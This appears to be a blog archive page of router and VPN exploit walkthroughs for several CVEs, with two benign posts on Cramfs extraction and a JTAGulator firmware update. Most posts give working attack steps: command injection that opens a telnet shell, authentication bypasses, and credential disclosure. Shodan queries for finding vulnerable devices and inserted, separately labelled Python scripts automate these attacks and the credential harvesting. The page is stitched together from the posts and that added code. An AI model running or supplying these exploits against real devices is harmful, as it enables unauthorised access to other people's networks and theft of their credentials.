Posts

Showing posts from December, 2021

CVE-2021-3707 D-Link DSL-2750U Router Unauthorized Configuration Modification Vulnerability

Introduction

D-Link DSL-2750U routers with firmware vME1.16 or earlier are vulnerable to unauthorized configuration modification: a configuration file can be uploaded to the router's TFTP server without knowing the router password.

Exploit

Export the configuration file from a DSL-2750U router whose password is known. Then connect to the TFTP server of the router whose password is not known and upload the configuration file containing the known password:

    tftp 192.168.1.1
    binary
    put cfg.xml

The entire configuration, including the router password, is replaced with the contents of the uploaded file.

CVE-2021-29379 D-Link DIR-802 UPnP M-SEARCH Command Injection Vulnerability

Introduction

Authentication can be bypassed on the D-Link DIR-802 A1 by injecting a payload into the Search Target (ST) field of an SSDP M-SEARCH discover packet, which the UPnP service passes into a shell command.

Exploit

Create a text file (payload.txt) with an SSDP M-SEARCH payload that injects a command to start a telnet service on port 1234:

    M-SEARCH * HTTP/1.1
    HOST:192.168.0.1:1900
    ST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 1234
    MX:2
    MAN:"ssdp:discover"

Send the payload to the UPnP UDP port 1900 using nc:

    nc -u 192.168.0.1 1900 < payload.txt

Connect to the telnet service on TCP port 1234:

    nc -v 192.168.0.1 1234

View the credentials in the file /var/passwd:

    cat /var/passwd
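The same M-SEARCH injection as an added example, not code from the original post. SSDP is HTTP over UDP, so the header lines must end with CRLF and the request must be terminated by an empty line; a payload file saved with bare LF endings or without the blank line may be ignored by the UPnP daemon. The router address, port and the telnetd command are the ones the post uses; the final check simply connects to port 1234 the way nc -v does.

```python
"""Build and send an SSDP M-SEARCH packet with a command injected into the ST
header (added example; not the original post's code)."""
import socket

TARGET = "192.168.0.1"
SSDP_PORT = 1900


def build_msearch(host: str, command: str,
                  st: str = "urn:schemas-upnp-org:service:WANIPConnection:1") -> bytes:
    """The ST value is the injection point: a ';' ends the shell word the
    firmware builds from it and the command after it runs as a second command."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        "HOST:%s:%d" % (host, SSDP_PORT),
        "ST:%s;%s" % (st, command),
        "MX:2",
        'MAN:"ssdp:discover"',
    ]
    # CRLF after every header and an empty line to close the request.
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def send_msearch(packet: bytes, host: str = TARGET, port: int = SSDP_PORT,
                 timeout: float = 2.0) -> bytes:
    """Send the packet over UDP; return any M-SEARCH reply, or b'' on timeout."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(packet, (host, port))
        try:
            data, _ = sock.recvfrom(4096)
            return data
        except socket.timeout:
            return b""
    finally:
        sock.close()


def port_is_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Equivalent of nc -v: did the injected telnetd start listening?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    pkt = build_msearch(TARGET, "telnetd -p 1234")
    send_msearch(pkt)
    print("telnet on 1234 reachable:", port_is_open(TARGET, 1234))
```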

Extract / Create Cramfs File System from Ubuntu 20.04

Extract Cramfs

Check the endianness of the Cramfs file:

    file cramfs

In this case the file is big endian. Convert the file cramfs to a little endian file cramfs_le using cramfsswap:

    cramfsswap cramfs cramfs_le

Extract the little endian file cramfs_le to the folder fs using fsck.cramfs:

    sudo fsck.cramfs --extract=fs cramfs_le

Create Cramfs

Use mkfs.cramfs to create a Cramfs file system from the contents of the folder fs. To create a little endian file system:

    sudo mkfs.cramfs fs cramfs_new

For a big endian Cramfs file system:

    sudo mkfs.cramfs -N big fs cramfs_new
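The endianness check that file(1) performs above can be done directly from the superblock, which is useful when scripting extraction of many firmware images. The following is an added example, not part of the original post: it reads the superblock as laid out in the kernel's struct cramfs_super (u32 magic 0x28cd3d45, u32 size, u32 flags, u32 future, 16-byte signature "Compressed ROMFS", 16-byte fsid holding crc/edition/blocks/files, 16-byte name), decides the byte order from which interpretation of the magic matches, and prints the cramfsswap and fsck.cramfs commands from the post that apply. The sample superblock it builds for testing is constructed, not taken from a real image.

```python
"""Detect the byte order of a Cramfs image from its superblock and plan the
extraction commands (added example; not the original post's code)."""
import struct

CRAMFS_MAGIC = 0x28CD3D45
CRAMFS_SIGNATURE = b"Compressed ROMFS"


def cramfs_endianness(header: bytes) -> str:
    """Return 'little' or 'big'; raise ValueError if this is not a Cramfs image."""
    if len(header) < 64:
        raise ValueError("need at least 64 bytes of superblock")
    if header[16:32] != CRAMFS_SIGNATURE:
        raise ValueError("Cramfs signature missing")
    for order, fmt in (("little", "<I"), ("big", ">I")):
        (magic,) = struct.unpack(fmt, header[:4])
        if magic == CRAMFS_MAGIC:
            return order
    raise ValueError("bad Cramfs magic")


def cramfs_info(header: bytes) -> dict:
    """Decode size, flags, fsid and name fields using the detected byte order."""
    order = cramfs_endianness(header)
    e = "<" if order == "little" else ">"
    _magic, size, flags, _future = struct.unpack(e + "4I", header[:16])
    _crc, _edition, blocks, files = struct.unpack(e + "4I", header[32:48])
    name = header[48:64].rstrip(b"\x00").decode(errors="replace")
    return {"endian": order, "size": size, "flags": flags,
            "blocks": blocks, "files": files, "name": name}


def extract_plan(path: str, header: bytes, outdir: str = "fs") -> list:
    """Commands from the post: cramfsswap first if big endian, then extract."""
    cmds = []
    src = path
    if cramfs_endianness(header) == "big":
        src = path + "_le"
        cmds.append("cramfsswap %s %s" % (path, src))
    cmds.append("sudo fsck.cramfs --extract=%s %s" % (outdir, src))
    return cmds


def make_sample(order: str) -> bytes:
    """Constructed 64-byte superblock for testing; not a real image."""
    e = "<" if order == "little" else ">"
    hdr = struct.pack(e + "4I", CRAMFS_MAGIC, 4096, 0x3, 0)
    hdr += CRAMFS_SIGNATURE
    hdr += struct.pack(e + "4I", 0xDEADBEEF, 0, 1, 5)   # crc, edition, blocks, files
    hdr += b"Compressed".ljust(16, b"\x00")
    return hdr


if __name__ == "__main__":
    import sys
    # usage: python cramfs_check.py cramfs
    with open(sys.argv[1], "rb") as f:
        head = f.read(64)
    print(cramfs_info(head))
    print("\n".join(extract_plan(sys.argv[1], head)))
```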

CVE-2021-20090 Arcadyan Routers Authentication Bypass Vulnerability

Introduction

A path traversal vulnerability in the web interface of routers running Arcadyan firmware (Buffalo and others) can be exploited to bypass authentication.

Exploit

1. Open Burp Suite, go to the Proxy > Options tab and add a Match and Replace rule that removes the path traversal string from the Referer request header: match /images/..%2f and replace it with /.

2. Add another Match and Replace rule that prefixes every request URL with images/..%2f: match GET / and replace it with GET /images/..%2f.

3. Browse the router web interface through the Burp Suite proxy browser. Every request URL is rewritten automatically by the proxy. Some of the pages that can be accessed without authentication:

    http://targetip
    http://targetip/info.html
    http://targetip/log_log.html
    http://targetip/lan_bridge.html
    http://targetip/save_init.html
    http://targetip/wireless_band2g.html
    http://targetip/ap_password_access_date_ntp.html

CVE-2021-40654 D-Link DIR-615 Authentication Bypass

Introduction

An information disclosure issue in the D-Link DIR-615 B2 (firmware 2.01mt) can be exploited to gain access to the device.

Exploit

1. Open the login page of the device through the Burp Suite proxy. Click the Login button and intercept the request.

2. Change the HTTP method from GET to POST.

3. Change the URL to /getcfg.php.

4. Set the POST data to SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1 followed by a newline.

5. Forward the request and view the response in the HTTP history tab. Find the password in the response and use it to log in to the device.
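The request from steps 2 to 4 can be sent without Burp. The following is an added example, not code from the original post: it posts exactly the body the post gives (including the trailing newline) to /getcfg.php and scans the reply for account entries. The response format is not shown in the post, so the <entry>, <name> and <password> tags the extractor looks for, and the sample reply used to test it, are assumptions; adjust them to whatever the device actually returns.

```python
"""DIR-615 getcfg.php unauthenticated account disclosure
(added example; not the original post's code)."""
import re
import urllib.request

BODY = "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1\n"   # trailing newline as in the post


def build_request(host: str) -> urllib.request.Request:
    """POST /getcfg.php with the form body; the method is forced to POST."""
    return urllib.request.Request(
        "http://%s/getcfg.php" % host,
        data=BODY.encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )


def dump_config(host: str, timeout: float = 5.0) -> str:
    """Send the request and return the response body as text."""
    with urllib.request.urlopen(build_request(host), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def extract_accounts(xml_text: str) -> list:
    """Return (name, password) pairs. Tag names are assumed, not taken from the post."""
    accounts = []
    for entry in re.findall(r"<entry>(.*?)</entry>", xml_text, re.S):
        name = re.search(r"<name>(.*?)</name>", entry, re.S)
        pw = re.search(r"<password>(.*?)</password>", entry, re.S)
        if name and pw:
            accounts.append((name.group(1).strip(), pw.group(1).strip()))
    return accounts


# Constructed sample reply for testing the extractor; not a capture from a device.
SAMPLE_REPLY = (
    "<device><account><entry><name>admin</name><password>s3cret</password></entry>"
    "<entry><name>guest</name><password></password></entry></account></device>"
)

if __name__ == "__main__":
    import sys
    # usage: python dir615_getcfg.py 192.168.0.1
    for name, pw in extract_accounts(dump_config(sys.argv[1])):
        print("%s : %s" % (name, pw))
```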

CVE-2014-9222 Misfortune Cookie Vulnerability Authentication Bypass

Introduction

AllegroSoft RomPager 4.34 and earlier, used in certain devices, has a vulnerability that can be exploited to bypass authentication using a crafted cookie.

Device Identification

Identify vulnerable devices with the Shodan query:

    "RomPager/4.07" "EXT:"

Exploit

Each firmware has a specific "number" and "offset" value, which can be obtained from:

    https://github.com/threat9/routersploit/blob/master/routersploit/modules/exploits/routers/multi/misfortune_cookie.py

For the TP-Link TD-8816 router with firmware V6_100907 the number is 107369788 and the offset is 1. To disable authentication on this router, the cookie to send is C107369788=A\x00. For the TP-Link TD-8840T V3_110221 the number and offset are 107369764 and 5, so the cookie is C107369764=AAAAA\x00.

Intercept the request sent by the login page in the Burp Suite proxy and add the cookie corresponding to the firmware as shown in the figure below. Click on the Hex tab and edit the value corresponding t
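The cookie ends in a literal NUL byte, which is why the post edits it in Burp's Hex tab: a normal HTTP library will refuse or strip it. The following is an added example, not code from the original post, that builds the cookie for a (number, offset) pair and sends the request over a raw socket so the NUL goes out unchanged. The two pairs are the ones quoted above for the TD-8816 V6_100907 and TD-8840T V3_110221; the request path "/" and the status-line check are assumptions.

```python
"""Misfortune Cookie (CVE-2014-9222) crafted-cookie request over a raw socket
(added example; not the original post's code)."""
import socket

# (number, offset) pairs quoted in the post; others are in the routersploit module.
KNOWN = {
    "TD-8816 V6_100907": (107369788, 1),
    "TD-8840T V3_110221": (107369764, 5),
}


def misfortune_cookie(number: int, offset: int) -> bytes:
    """Cookie C<number>=<'A' * offset><NUL>. The trailing NUL must be sent
    as a raw byte, so everything here stays in bytes."""
    return b"C%d=%s\x00" % (number, b"A" * offset)


def build_request(host: str, number: int, offset: int, path: str = "/") -> bytes:
    """Complete HTTP/1.1 request with the crafted Cookie header."""
    return (
        b"GET " + path.encode() + b" HTTP/1.1\r\n"
        + b"Host: " + host.encode() + b"\r\n"
        + b"Cookie: " + misfortune_cookie(number, offset) + b"\r\n"
        + b"Connection: close\r\n\r\n"
    )


def send_raw(host: str, request: bytes, port: int = 80, timeout: float = 5.0) -> bytes:
    """Send the bytes as-is and read until the server closes the connection."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def status_line(response: bytes) -> str:
    """First line of the response, e.g. 'HTTP/1.1 200 OK'."""
    return response.split(b"\r\n", 1)[0].decode(errors="replace")


if __name__ == "__main__":
    import sys
    # usage: python misfortune.py 192.168.1.1 "TD-8816 V6_100907"
    number, offset = KNOWN[sys.argv[2]]
    reply = send_raw(sys.argv[1], build_request(sys.argv[1], number, offset))
    print(status_line(reply))
```

Send the request once; after it, the post's login page should stop asking for credentials, which can be checked by a second plain GET without the cookie.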

CVE-2018-13379 Fortinet FortiOS Path Traversal/Arbitrary File Read Vulnerability

Introduction

The Fortinet FortiOS SSL VPN web portal allows system files to be downloaded without authentication.

Device Identification

Identify vulnerable devices from the results of the Shodan query:

    http.html_hash:-1454941180

Path Traversal

Access the sslvpn_websession file, which contains credentials, using the URL:

    https://targetIP:port/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
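sslvpn_websession is a binary file, so the usual next step after downloading it is to pull out the printable runs the way strings(1) does. The following is an added example, not code from the original post: it requests the traversal URL given above and extracts printable strings from the reply. Certificate verification is disabled because these portals usually present self-signed certificates; the User-Agent header and the sample bytes used to test the extractor are assumptions and constructed data, not a real capture.

```python
"""FortiOS sslvpn_websession download and strings extraction
(added example; not the original post's code)."""
import re
import ssl
import urllib.request

TRAVERSAL_PATH = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"


def websession_url(host: str, port: int = 443) -> str:
    return "https://%s:%d%s" % (host, port, TRAVERSAL_PATH)


def fetch_websession(host: str, port: int = 443, timeout: float = 10.0) -> bytes:
    """Download the session file; TLS verification is off for self-signed portals."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(websession_url(host, port),
                                 headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return resp.read()


def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII of at least min_len bytes, like strings(1)."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


# Constructed sample: NUL-padded fields of the kind a session file holds (not a real capture).
SAMPLE = b"\x00\x00user1\x00\x00\x00\x00Passw0rd!\x00\x00\x00\x0010.0.0.5\x00ab\x00"

if __name__ == "__main__":
    import sys
    # usage: python forti_websession.py targetIP [port]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    for s in printable_strings(fetch_websession(sys.argv[1], port)):
        print(s)
```

urllib sends the request path verbatim, so the ../ and the run of slashes reach the server unnormalised; a client that canonicalises the URL first (many browsers do) will not reproduce the read.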

JTAGulator Firmware Upgrade from Ubuntu Linux

Steps

1. Download the latest stable firmware from the JTAGulator GitHub page. At the moment, version 1.11 is the latest:

    wget https://github.com/grandideastudio/jtagulator/archive/refs/tags/1.11.zip

2. Unzip the downloaded file. JTAGulator.eeprom is the file required for upgrading the firmware:

    unzip 1.11.zip

3. Download the BST command line loader:

    wget https://www.fnarfbargle.com/bst/bstl/Latest/bstl.linux.zip

4. Unzip the BST loader zip file:

    unzip bstl.linux.zip

5. Upgrade the JTAGulator firmware:

    sudo ./bstl.linux -d /dev/ttyUSB0 -p 3 jtagulator-1.11/JTAGulator.eeprom